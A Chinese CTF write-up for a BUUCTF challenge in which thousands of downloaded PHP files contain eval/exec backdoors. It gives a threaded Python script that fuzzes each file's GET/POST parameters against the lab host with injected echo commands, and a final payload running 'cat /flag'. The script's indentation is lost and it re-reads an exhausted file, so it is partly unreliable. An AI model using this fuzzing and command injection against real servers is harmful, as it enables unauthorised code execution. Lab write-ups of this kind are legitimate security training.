这题也没啥好说的,就是硬跑脚本 打开场景,就是让你下www.tar.gz 解压好了,两千多个PHP,execuse me??????? 打开看看,每个PHP文件里面都有eval,exec之类的,但也不是全部有用,事实上,跑完就只有一个参数有用 就是通过脚本,不断地去试,也没啥好说的,两种做法: 1.把文件全都下到本地,自己开个环境,把最大连接数调大些,自己跑,找到参数,再去利用 2.直接用靶场跑,我测试了一下,BUUCTF能承受的最大的连接数在20左右,我把网上大佬在本地跑的脚本改了一下,加了几个sleep() 防止url连接没释放掉触发429,运行速度在五分钟左右,比大佬在本地跑的4分中也慢不了多少
import os
import requests
import re
import threading
import time
print('开始时间: ' + time.asctime(time.localtime(time.time())))
s1 = threading.Semaphore(15)
filePath = r"D:\wamp\www\src"
os.chdir(filePath)
requests.adapters.DEFAULT_RETRIES = 5
files = os.listdir(filePath)
session = requests.Session()
session.keep_alive = False
def get_content(file):
s1.acquire()
print('trying ' + file + ' ' + time.asctime(time.localtime(time.time())))
with open(file, encoding='utf-8') as f:
gets = list(re.findall('\$_GET\[\'(.*?)\'\]', f.read()))
posts = list(re.findall('\$_POST\[\'(.*?)\'\]', f.read()))
data = {}
params = {}
for m in gets:
params[m] = "echo 'xxxxxx';"
for n in posts:
data[n] = "echo 'xxxxxx';"
url = 'http://4e199aac-a3a6-4fc4-bf08-7d9b7fbef682.node4.buuoj.cn:81/' + file
req = session.post(url, data=data, params=params)
req.close()
time.sleep(2)
req.encoding = 'utf-8'
content = req.text
print(content)
if "xxxxxx" in content:
flag = 0
for a in gets:
req = session.get(url + '?%s=' % a + "echo 'xxxxxx';")
content = req.text
req.close()
time.sleep(2)
if "xxxxxx" in content:
flag = 1
break
if flag != 1:
for b in posts:
req = session.post(url, data={b: "echo 'xxxxxx';"})
content = req.text
req.close()
time.sleep(2)
if "xxxxxx" in content:
break
if flag == 1:
param = a
else:
param = b
print('找到了利用文件: ' + file + " and 找到了利用的参数:%s" % param)
print('结束时间: ' + time.asctime(time.localtime(time.time())))
s1.release()
for i in files:
t = threading.Thread(target=get_content, args=(i,))
t.start()
最终payload:xk0SzyKwfzw.php?Efa5BVG=cat /flag 参考视频连接:https://www.bilibili.com/video/BV1zg411w784?spm_id_from=333.999.0.0
|